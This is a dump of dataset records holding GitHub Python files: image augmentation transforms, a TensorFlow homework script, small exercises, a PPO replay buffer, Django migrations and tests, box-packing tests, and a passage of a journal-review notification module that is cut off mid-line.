cols)\n return bbox_returned\n\n def _normalize(self, h, w, xsteps, ysteps):\n # compensate for smaller last steps in source image.\n x_step = w // self.num_steps\n last_x_step = min(w, ((self.num_steps + 1) * x_step)) - (self.num_steps * x_step)\n xsteps[-1] *= last_x_step / x_step\n\n y_step = h // self.num_steps\n last_y_step = min(h, ((self.num_steps + 1) * y_step)) - (self.num_steps * y_step)\n ysteps[-1] *= last_y_step / y_step\n\n # now normalize such that distortion never leaves image bounds.\n tx = w / math.floor(w / self.num_steps)\n ty = h / math.floor(h / self.num_steps)\n xsteps = np.array(xsteps) * (tx / np.sum(xsteps))\n ysteps = np.array(ysteps) * (ty / np.sum(ysteps))\n\n return {\"stepsx\": xsteps, \"stepsy\": ysteps}\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n stepsx = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n stepsy = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n\n if self.normalized:\n return self._normalize(h, w, stepsx, stepsy)\n\n return {\"stepsx\": stepsx, \"stepsy\": stepsy}\n\n def get_transform_init_args_names(self):\n return \"num_steps\", \"distort_limit\", \"interpolation\", \"border_mode\", \"value\", \"mask_value\", \"normalized\"\n","repo_name":"albumentations-team/albumentations","sub_path":"albumentations/augmentations/geometric/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":62848,"program_lang":"python","lang":"en","doc_type":"code","stars":12818,"dataset":"github-code","pt":"16"}
+{"seq_id":"9970624977","text":"import tensorflow as tf\r\nimport keras.layers\r\n\r\nn_neurons_h = 178\r\nn_neurons_out = 3\r\nn_epochs = 4500\r\nlearning_rate = 0.7\r\n\r\nmodel = tf.keras.Sequential()\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_out, activation=\"softmax\"))\r\n\r\nmodel.fit(training_data, training_labels, epochs=n_epochs, batch_size=32)\r\n\r\nmodel.compile(optimizer=tf.train.GradientDescentOptimizer(learning_rate=learning_rate), loss=\"binary_crossentropy\",\r\n metrics=[\"accuracy\"])\r\nmodel.fit(training_X, training_y, epochs=n_epochs)\r\n","repo_name":"Yasaman1997/Principles_Of_Datamining","sub_path":"HW3/Part2/Drinks/drinks/tensorflow.py","file_name":"tensorflow.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"10709110775","text":"# squareroot.py\n# This program takes a postiive floating point number as input\n# and outputs an approximation of its square root\n# author: Rachel King\n\ndef sqrt(n) :\n # Assuming the sqrt of n as n only\n x = n\n # To count the number of iterations\n count = 0\n while (1) :\n count += 1\n # Calculate estimate\n root = 0.5 * (x + (n / x))\n # Check for closeness # this is to set how accurate we want the result to be\n if (abs(root - x) < 0.0001) : # it's set to be accurate within 0.0001 \n break\n # Update root\n x = root\n return root\ndef amount(message = \"Please enter a postive number: \"):\n num = False\n while (not num):\n try:\n num = float(input(message))\n except ValueError:\n print(\"That was not a number: \",end=\"\")\n return num\nn = amount()\nanswer = float(sqrt(n))\nanswer_rounded = \"{:.1f}\".format(answer)\nprint(f\"The square root of {n} is approx. {answer_rounded}\")","repo_name":"rachel-king4/pands-problem-sheet","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70916798090","text":"import jax\nimport jax.numpy as jnp\nimport dm_env\nimport numpy as np\n\n\nclass FixedReplayBuffer:\n \"\"\"Fixed-size buffer to store transition tuples.\"\"\"\n\n def __init__(self, key_replay_buffer) -> None:\n self.timestep = None\n self.last_value = None\n self._key_replay_buffer = key_replay_buffer\n\n # values_t stores one more step (it also stores last value)\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def __len__(self):\n return len(self.dones_tp1)\n\n def add_first(self, timestep: dm_env.TimeStep) -> None:\n self.timestep = timestep\n\n def add(self, value: float, log_probability: float, action: np.ndarray, next_timestep: dm_env.TimeStep) -> None:\n \"\"\"Add a new transition to memory.\"\"\"\n assert self.timestep is not None, \"Please let the agent observe a first timestep.\"\n\n self.values_t.append(value)\n self.obs_t.append(self.timestep.observation)\n self.actions_t.append(action)\n self.rewards_tp1.append(next_timestep.reward)\n self.dones_tp1.append(next_timestep.last())\n self.logprobs_t.append(log_probability)\n self.timestep = next_timestep\n\n def add_last_value(self, value: float) -> None:\n self.values_t.append(value)\n\n def clear_memory(self):\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def add_advantages(self, advantages):\n self.advantages_t = advantages\n\n def cast_to_numpy(self):\n self.values_t = np.array(self.values_t)\n self.obs_t = np.array(self.obs_t)\n self.actions_t = np.array(self.actions_t)\n self.rewards_tp1 = np.array(self.rewards_tp1)\n self.dones_tp1 = np.array(self.dones_tp1)\n self.logprobs_t = np.array(self.logprobs_t)\n","repo_name":"emasquil/ppo","sub_path":"ppo/replay_buffers/fixed_replay_buffer.py","file_name":"fixed_replay_buffer.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"28964575004","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('class_name', models.CharField(max_length=100, editable=False)),\n ('name', models.CharField(max_length=100, editable=False)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('value', models.TextField(null=True, blank=True)),\n ('last_modified_date', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"McHogardty/MedBank","sub_path":"medbank/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37043148034","text":"# Abhinav Bassi\n# CS 100 2014F Section H03\n# TTTP2: Oct 22, 2014\n\n# 1\n\ndef tttDrawMove(t, row, col, mark, edge):\n buffer = (.2*edge)\n newEdge = edge - (2*buffer)\n t.up()\n t.width(1)\n t.goto(0,0)\n if row == 0:\n y = -((3/2)*edge)\n elif row == 1:\n y = -((1/2)*edge)\n elif row == 2:\n y = ((1/2)*edge)\n if col == 0:\n x = 0-edge\n elif col == 1:\n x = 0\n elif col == 2:\n x = 0+edge\n t.goto(x,y)\n if mark =='x' or mark == 'X':\n t.up()\n t.setheading(0)\n t.forward(newEdge/2)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.left(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.forward(newEdge)\n t.right(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.goto(0,0)\n if mark =='o' or mark == 'O':\n t.up()\n t.setheading(0)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.down()\n t.circle(newEdge/2)\n t.up()\n t.setheading(0)\n t.goto(0,0)\n\n# 2\n\ndef drawGrid(t, length, x, y):\n t.width(2)\n beginX = [x, x, x+length, x+(2*length)]\n endX = [x+(3*length), x+(3*length), x+(length), x+(2*length)]\n beginY = [y+(2*length), y+length, y, y]\n endY = [y+(2*length), y+length, y+(3*length), y+(3*length)]\n for i in range(4):\n t.up()\n t.goto(beginX[i],beginY[i])\n t.down()\n t.goto(endX[i],endY[i])\n\nimport turtle\ns = turtle.Screen()\npen = turtle.Turtle()\ndrawGrid(pen,100,-150,-150)\n\nimport math\ntttDrawMove(pen, 0, 0, 'X', 100)\ntttDrawMove(pen, 0, 1, 'X', 100)\ntttDrawMove(pen, 0, 2, 'X', 100)\ntttDrawMove(pen, 1, 0, 'O', 100)\ntttDrawMove(pen, 1, 1, 'O', 100)\ntttDrawMove(pen, 1, 2, 'O', 100)\n","repo_name":"abhibassi/cs100","sub_path":"TTTP2_AbhinavBassi.py","file_name":"TTTP2_AbhinavBassi.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10884447474","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jae'\n\nfrom typing import List\n\nfrom hot100.ListNode import ListNode\n\n\n# https://leetcode.com/problems/merge-k-sorted-lists/\nclass MergeKSortedLists:\n\n # 1.优先队列\n # 依次加入优先级队列,每次都取出最小的\n # heapq\n # Runtime: 108 ms, faster than 70.85% of Python3 online submissions for Merge k Sorted Lists.\n # Memory Usage: 17.6 MB, less than 12.12% of Python3 online submissions for Merge k Sorted Lists.\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists is None: return None\n import heapq\n head = []\n headNode = ListNode()\n tempNode = ListNode()\n headNode.next = tempNode\n for i in range(len(lists)):\n if lists[i] is None: continue\n heapq.heappush(head, (lists[i].val, i))\n if head is None: return None\n while head:\n val, index = heapq.heappop(head)\n tempNode.next = ListNode(val)\n tempNode = tempNode.next\n if lists[index]:\n lists[index] = lists[index].next\n if lists[index] is not None:\n heapq.heappush(head, (lists[index].val, index))\n return headNode.next.next\n\n # 2.分治,两个两个处理\n def mergeKLists2(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n length = len(lists)\n return self.merge(lists, 0, length - 1)\n\n def merge(self, lists, left, right):\n if right == left:\n return lists[left]\n mid = left + (right - left) // 2\n l1 = self.merge(lists, left, mid)\n l2 = self.merge(lists, mid + 1, right)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 is None:\n return l2\n if l2 is None:\n return l1\n if l1.val <= l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n # 3.对值平铺,排序\n def mergeKLists3(self, lists: List[ListNode]) -> ListNode:\n list1 = []\n for i in lists:\n while i:\n list1.append(i.val)\n i = i.next\n list1.sort()\n prev = ListNode()\n res = prev\n for i in list1:\n node = ListNode(i)\n prev.next = node\n prev = node\n return res.next\n\n\nif __name__ == \"__main__\":\n listNode1 = ListNode(1)\n listNode4 = ListNode(4)\n listNode5 = ListNode(5)\n listNode1.next = listNode4\n listNode4.next = listNode5\n\n listNode12 = ListNode(1)\n listNode3 = ListNode(3)\n listNode42 = ListNode(4)\n listNode12.next = listNode3\n listNode3.next = listNode42\n\n listNode2 = ListNode(2)\n listNode6 = ListNode(6)\n listNode2.next = listNode6\n\n check = MergeKSortedLists()\n check.mergeKLists2([listNode1, listNode12, listNode2]).log()\n","repo_name":"dyjae/LeetCodeLearn","sub_path":"python/hot100/23.MergeKSortedLists.py","file_name":"23.MergeKSortedLists.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11572008969","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom django.core.cache import cache\n\nfrom ..models import Group, Post\n\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group\n )\n\n def setUp(self):\n cache.clear()\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_post = Client()\n self.author_post.force_login(self.post.author)\n\n def test_pages_all(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.post.author}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n 'unexisting_page/': HTTPStatus.NOT_FOUND,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_pages_registred(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.user}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n '/unexisting_page/': HTTPStatus.NOT_FOUND,\n '/create/': HTTPStatus.OK,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_edit_page_for_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n with self.subTest(address=edit_post):\n response = self.author_post.get(edit_post)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_edit_page_for_authorized_non_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n response = self.authorized_client.get(edit_post)\n self.assertRedirects(response, f'/posts/{self.post.id}/')\n\n def test_edit_and_create_page_for_guest(self):\n edit_redir = f'/auth/login/?next=/posts/{self.post.id}/edit/'\n url_redir = {\n f'/posts/{self.post.id}/edit/': edit_redir,\n '/create/': '/auth/login/?next=/create/',\n }\n for address, redir in url_redir.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address, follow=True)\n self.assertRedirects(response, redir)\n","repo_name":"vmikail/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42669944870","text":"from fulfillment_api.box_packing.helper import (space_after_packing,\n how_many_items_fit, pre_pack_boxes,\n api_packing_algorithm)\nfrom fulfillment_api.errors import BoxError\n\nfrom collections import Counter\nfrom testing.shotput_tests import BaseShotputTestCase\n\n\nclass HowManyItemsFitTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 1,\n 'remaining_volume': 0\n }, response)\n\n def test_five_fit_extra_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 3,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 5,\n 'remaining_volume': 4\n }, response)\n\n def test_lots_and_lots(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 64,\n 'remaining_volume': 0\n }, response)\n\n def test_max_packed(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info, 8)\n self.assertEqual({\n 'total_packed': 8,\n 'remaining_volume': 56\n }, response)\n\n\nclass SpaceAfterPackingTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 0,\n 'remaining_dimensional_blocks': []\n }, response)\n\n def test_additional_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 2,\n 'width': 2,\n 'length': 2\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 56,\n 'remaining_dimensional_blocks': [\n {'width': 2, 'height': 2, 'length': 2},\n {'width': 2, 'height': 2, 'length': 4},\n {'width': 2, 'height': 4, 'length': 4}]\n }, response)\n\n\nclass PrePackBoxesTest(BaseShotputTestCase):\n\n def test_pre_pack_boxes_simple(self):\n '''\n tests to make sure we can get a pre-pack of boxes with basic non-db info\n '''\n items_info = [{\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'quantity': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams',\n 'product_name': 'TEST_SKU'\n }]\n box_info = {\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {}\n self.assertEqual([{\n 'packed_products': {'TEST_SKU': 1},\n 'total_weight': 2\n }], pre_pack_boxes(box_info, items_info, options))\n\n def test_pre_pack_boxes_too_heavy(self):\n '''\n tests to make sure that when a predefined max weight is provided it\n doesn't over load the boxes\n '''\n items_info = [{\n 'product_name': 'TEST_SKU',\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 3000,\n 'quantity': 4,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }]\n box_info = {\n 'width': 1,\n 'height': 2,\n 'length': 2,\n 'weight': 0,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {\n 'max_weight': 8999\n }\n response = pre_pack_boxes(box_info, items_info, options)\n self.assertEqual([\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n },\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n }\n ], response)\n\n\nLONG_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 8,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x8',\n 'weight': 4\n}\n\nCUBE_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x4',\n 'weight': 4\n}\n\nTOO_SMALL_BOX = {\n 'width': 2,\n 'height': 2,\n 'length': 2,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '2x2x2',\n 'weight': 4\n}\n\nCUBE_SKU = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'product_name': 'TEST',\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'weight': 100\n}\n\n\nclass ApiPackingAlgorithmTest(BaseShotputTestCase):\n\n def setUp(self):\n super(ApiPackingAlgorithmTest, self).setUp()\n self.boxes = {\n '4x4x4': CUBE_BOX,\n '4x4x8': LONG_BOX,\n '2x2x2': TOO_SMALL_BOX\n }\n self.items = {\n '4x4x4': CUBE_SKU\n }\n\n def test_api_packing_algorithm_max_weight(self):\n products = [{\n 'width': 10,\n 'height': 10,\n 'length': 5,\n 'weight': 100,\n 'quantity': 1,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-123'\n }, {\n 'width': 10,\n 'height': 5,\n 'length': 5,\n 'weight': 100,\n 'quantity': 4,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-456'\n }]\n\n result = api_packing_algorithm([{\n 'width': 10,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-1'\n }, {\n 'width': 5,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-2'\n }], products, {\n 'max_weight': 300\n })\n\n expected_counts = Counter()\n for product in products:\n expected_counts[product['product_name']] += product['quantity']\n\n packed_counts = Counter()\n for package in result['packages']:\n self.assertLessEqual(package['total_weight'], 300)\n\n for item_number, quantity in package['packed_products'].iteritems():\n packed_counts[item_number] += quantity\n\n self.assertEqual(expected_counts, packed_counts)\n\n def test_api_packing_algorithm_simple(self):\n boxes_info = [self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_two_boxes(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_last_parcel(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [\n {\n 'packed_products': {'TEST': 2},\n 'total_weight': 204,\n 'box': self.boxes['4x4x8']\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_too_small(self):\n boxes_info = [self.boxes['2x2x2']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Some of your products are too big for your boxes. '\n 'Please provide larger boxes.',\n context.exception.message)\n\n def test_api_packing_max_weight(self):\n boxes_info = [self.boxes['4x4x8'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n options = {'max_weight': 200}\n\n expected_return = {\n 'packages': [\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n packed_products = api_packing_algorithm(boxes_info, items_info, options)\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_non_unique(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Please use unique boxes with unique names',\n context.exception.message)\n","repo_name":"shotput/BoxPackingAPI","sub_path":"test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"}
+{"seq_id":"17278865302","text":"__copyright__ = \"Copyright 2017 Birkbeck, University of London\"\n__author__ = \"Martin Paul Eve & Andy Byers\"\n__license__ = \"AGPL v3\"\n__maintainer__ = \"Birkbeck Centre for Technology and Publishing\"\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom utils import (\n notify_helpers,\n models as util_models,\n setting_handler,\n render_template,\n)\nfrom core import models as core_models\nfrom review import logic as review_logic\nfrom review.const import EditorialDecisions as ED\n\n\ndef send_reviewer_withdrawl_notice(**kwargs):\n review_assignment = kwargs['review_assignment']\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s review of \"{1}\" has been withdrawn by {2}'.format(review_assignment.reviewer.full_name(),\n review_assignment.article.title,\n request.user.full_name())\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Review Withdrawl',\n 'target': review_assignment.article}\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_withdrawl',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_unassigned_notice(request, message, assignment, skip=False):\n description = \"{a.editor} unassigned from {a.article} by {r.user}\".format(\n a=assignment,\n r=request,\n )\n\n if not skip:\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Editor Unassigned',\n 'target': assignment.article\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_unassign_editor',\n assignment.editor.email,\n message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_assigned_acknowledgements_mandatory(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py. It is different to the below function in that this is called when an editor is\n assigned, whereas the below is only called when the user opts to send a message to the editor.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n editor_assignment = kwargs['editor_assignment']\n article = editor_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n acknowledgement = kwargs['acknowledgement']\n\n description = '{0} was assigned as the editor for \"{1}\"'.format(editor_assignment.editor.full_name(),\n article.title)\n\n context = {\n 'article': article,\n 'request': request,\n 'editor_assignment': editor_assignment\n }\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Editor Assignment',\n 'target': article}\n\n # send to assigned editor\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_editor_assignment',\n editor_assignment.editor.email,\n user_message_content,\n log_dict=log_dict\n )\n\n # send to editor\n if not acknowledgement:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(request, 'editor_assignment',\n 'subject_editor_assignment',\n request.user.email, context,\n log_dict=log_dict)\n\n\ndef send_editor_assigned_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n kwargs['acknowledgement'] = True\n\n send_editor_assigned_acknowledgements_mandatory(**kwargs)\n\n\ndef send_reviewer_requested_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has been requested.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = 'A review request was added to \"{0}\" for user {1}'.format(\n article.title,\n review_assignment.reviewer.full_name(),\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Review Request',\n 'target': article}\n\n # send to requested reviewer\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_assignment',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict,\n )\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_review_complete_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has completed his or her\n review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n request.user = review_assignment.reviewer\n\n description = '{0} completed the review of \"{1}\": {2}'.format(\n review_assignment.reviewer.full_name(),\n article.title,\n review_assignment.get_decision_display(),\n )\n\n util_models.LogEntry.add_entry(\n types='Review Complete',\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_reviewer_acknowledgement',\n 'subject_review_complete_reviewer_acknowledgement',\n review_assignment.reviewer.email,\n context,\n )\n\n # send to editor\n context['review_in_review_url'] = review_in_review_url\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_acknowledgement',\n 'subject_review_complete_acknowledgement',\n editor.email,\n context,\n )\n\n\ndef send_reviewer_accepted_or_decline_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has either accepted or\n declined to review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, accepted and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n accepted = kwargs['accepted']\n\n description = '{0} {1} to review {2}'.format(\n review_assignment.reviewer.full_name(),\n ('accepted' if accepted else 'declined'),\n article.title,\n )\n\n util_models.LogEntry.add_entry(\n types='Review request {0}'.format(('accepted' if accepted else 'declined')),\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_url = 